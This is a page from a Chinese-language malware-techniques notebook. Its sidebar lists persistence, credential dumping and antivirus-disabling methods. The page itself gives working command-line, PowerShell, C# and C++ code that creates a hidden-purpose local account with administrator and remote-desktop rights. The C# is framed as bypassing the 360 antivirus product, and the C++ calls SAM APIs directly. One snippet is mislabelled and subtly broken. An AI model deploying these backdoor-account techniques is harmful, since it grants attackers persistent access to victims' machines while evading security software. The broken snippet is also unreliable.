Malware Note
main
main
  • 恶意软件学习笔记
  • 权限维持
    • 服务
      • 新建服务
      • 修改服务
      • 隐藏服务
      • 劫持服务
    • 启动项
      • 注册表
      • 文件夹
    • 用户账户
      • 新建用户
      • 隐藏用户
    • DLL劫持
      • 劫持自启动程序
      • 劫持.NET程序
    • COM劫持
      • COM劫持
    • 映像劫持
      • 映像劫持
    • 计划任务
      • 新建任务
    • WMI
      • WMI事件
    • Office
      • VSTO
      • WLL/XLL
      • 模板文件
      • COM劫持
    • BITS Jobs
      • BITS
    • Rootkit
      • Rootkit
    • 未分类
      • Windows Telemetry
      • 替换文件
      • AppInit_DLLs注入
      • 粘滞键
      • cmd启动劫持
      • 屏幕保护
      • 注册SSP DLL
      • AddMonitor
      • 滥用POWERSHELL配置文件
      • W32Time
      • UWP
      • Waitfor
      • Bios
      • 劫持更新程序
      • 利用LAPS
      • SDB文件
  • 提权
    • UAC Bypass
    • 漏洞
    • 错误配置
  • 横向移动
    • WMI
    • RPC
    • DCOM
    • HASH
    • Kerberos tickets
  • 文件结构
    • Office
    • LNK
      • 钓鱼lnk
    • PE
    • CHM
      • 钓鱼chm
  • 注入
    • 注入
  • 反分析
    • 反虚拟机/沙盒
  • 获取用户密码或hash
    • SMB
    • 注入mstsc.exe
    • Mimikatz
    • NPLogonNotify
    • Tickets
  • 进程链
    • 启动进程
  • 关闭杀软
    • 关闭WD
  • AMSI
    • 绕过AMSI
  • Dump内存
    • MiniDumpWriteDump
    • Shellcode
    • SilentProcessExit
    • procdump
    • Task Manager/Process Explorer
    • Sqldumper
    • comsvcs.dll
    • WinPmem
    • ProcessDump.exe
    • Dumpert
    • BSOD
    • PPLdump
    • Hibernation
  • 木马分析
    • Stealer
      • 输入法
    • Hidden Remote
  • 常用工具
    • Untitled
  • 鬼知道有什么用的小知识
    • 鬼知道有什么用的小知识
由 GitBook 提供支持
在本页

这有帮助吗?

  1. 权限维持
  2. 用户账户

新建用户

新建用户并添加管理员及远程访问权限

命令行:

net user qwqdanchun password /add /y
net localgroup administrators qwqdanchun /add
net localgroup "remote desktop users" qwqdanchun /add

Powershell:

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","qwqdanchun")
od.SetPassword "password"
od.SetInfo
Set of=GetObject(os&"/admin",user)
oe.add os&"/admin"

Powershell(另一个版本):

$Username = "qwqdanchun"
$P = "password"
$Password = ConvertTo-SecureString $P -AsPlainText -Force
New-LocalUser $Username -Password $Password -FullName "test account" -Description "test user."
Add-LocalGroupMember -Group "administrators" -Member "qwqdanchun"

c#(使用系统 API 函数):

using System;
using System.Runtime.InteropServices;
namespace Bypass360Add
{
    public static class BypassUAC_csharp
    {
        [DllImport("kernel32.dll")]
        static extern void ExitProcess(uint uExitCode);
        public static void Main(string[] args)
        {
            LocalGroupUserHelper local = new LocalGroupUserHelper();
            string username = "qwqdanchun";
            string password = "password";
            string groupname = "Administrators";
            local.AddUser(null, username, password, null);
            local.GroupAddMembers(null, groupname, username);
            ExitProcess(1);
        }
    }
    public class LocalGroupUserHelper
    {
        [DllImport("Netapi32.dll")]
        extern static int NetUserAdd([MarshalAs(UnmanagedType.LPWStr)] string servername, int level, ref USER_INFO_1 buf, int parm_err);
        [DllImport("Netapi32.dll")]
        extern static int NetLocalGroupAddMembers([MarshalAs(UnmanagedType.LPWStr)] string servername, [MarshalAs(UnmanagedType.LPWStr)] string groupname,
         int level, ref LOCALGROUP_MEMBERS_INFO_3 buf, int totalentries);
        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        public struct LOCALGROUP_MEMBERS_INFO_3
        {
            public string domainandname; // //lgrmi3_domainandname
        }
       [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        public struct USER_INFO_1
        {
            public string usri1_name;
            public string usri1_password;
            public int usri1_password_age;
            public int usri1_priv;
            public string usri1_home_dir;
            public string comment;
            public int usri1_flags;
            public string usri1_script_path;
        }
        public void AddUser(string serverName, string userName, string password, string strComment)
        {
            USER_INFO_1 NewUser = new USER_INFO_1(); //创建一个USER_INFO_1实例
            NewUser.usri1_name = userName; // Allocates the username
            NewUser.usri1_password = password; // allocates the password
            NewUser.usri1_priv = 1; // Sets the account type to USER_PRIV_USER
            NewUser.usri1_home_dir = null; // We didn't supply a Home Directory
            NewUser.comment = strComment; // Comment on the User
            NewUser.usri1_script_path = null; // We didn't supply a Logon Script Path
            if (NetUserAdd(serverName, 1, ref NewUser, 0) != 0) //添加失败后返回非0
            {
                Console.WriteLine("Error Adding User");
            }
        }
        public void GroupAddMembers(string serverName, string groupName, string userName)
        {
            LOCALGROUP_MEMBERS_INFO_3 NewMember = new LOCALGROUP_MEMBERS_INFO_3();
            NewMember.domainandname = userName;
            if (NetLocalGroupAddMembers(serverName, groupName, 3, ref NewMember, 1) != 0) //添加失败后返回非0
            {
                Console.WriteLine("Error Adding Group Member"); 
            }
        }
    }
}

c++(重写AddUser):

#include "ApiAddUser.h"



int wmain(int argc, wchar_t* argv[])
{
    UNICODE_STRING UserName;
    UNICODE_STRING PassWord;
    HANDLE ServerHandle = NULL;
    HANDLE DomainHandle = NULL;
    HANDLE UserHandle = NULL;
    ULONG GrantedAccess;
    ULONG RelativeId;
    NTSTATUS Status = NULL;
    HMODULE hSamlib = NULL;
    HMODULE hNtdll = NULL;
    HMODULE hNetapi32 = NULL;
    LSA_HANDLE hPolicy = NULL;
    LSA_OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
    PPOLICY_ACCOUNT_DOMAIN_INFO DomainInfo = NULL;
    USER_ALL_INFORMATION uai = { 0 };


    hSamlib = LoadLibraryA("samlib.dll");
    hNtdll = LoadLibraryA("ntdll");

    pSamConnect SamConnect = (pSamConnect)GetProcAddress(hSamlib, "SamConnect");
    pSamOpenDomain SamOpenDomain = (pSamOpenDomain)GetProcAddress(hSamlib, "SamOpenDomain");
    pSamCreateUser2InDomain SamCreateUser2InDomain = (pSamCreateUser2InDomain)GetProcAddress(hSamlib, "SamCreateUser2InDomain");
    pSamSetInformationUser SamSetInformationUser = (pSamSetInformationUser)GetProcAddress(hSamlib, "SamSetInformationUser");
    pSamQuerySecurityObject SamQuerySecurityObject = (pSamQuerySecurityObject)GetProcAddress(hSamlib, "SamQuerySecurityObject");
    pRtlInitUnicodeString RtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");

    RtlInitUnicodeString(&UserName, L"Admin");
    RtlInitUnicodeString(&PassWord, L"Admin");

    Status = SamConnect(NULL, &ServerHandle, SAM_SERVER_CONNECT | SAM_SERVER_LOOKUP_DOMAIN, NULL);;
    Status = LsaOpenPolicy(NULL,&ObjectAttributes,POLICY_VIEW_LOCAL_INFORMATION,&hPolicy);
    Status = LsaQueryInformationPolicy(hPolicy, PolicyAccountDomainInformation, (PVOID*)&DomainInfo);

    Status = SamOpenDomain(ServerHandle, 
        DOMAIN_CREATE_USER | DOMAIN_LOOKUP | DOMAIN_READ_PASSWORD_PARAMETERS, 
        DomainInfo->DomainSid, 
        &DomainHandle);

    Status = SamCreateUser2InDomain(DomainHandle,
        &UserName,
        USER_NORMAL_ACCOUNT,
        USER_ALL_ACCESS | DELETE | WRITE_DAC,
        &UserHandle,&GrantedAccess,&RelativeId);

    RtlInitUnicodeString(&uai.NtPassword, PassWord.Buffer);
    uai.NtPasswordPresent = TRUE;
    uai.WhichFields |= USER_ALL_NTPASSWORDPRESENT;


    Status = SamSetInformationUser(UserHandle,
        UserAllInformation,
        &uai);

    return 0;
}
上一页用户账户下一页隐藏用户

最后更新于3年前

这有帮助吗?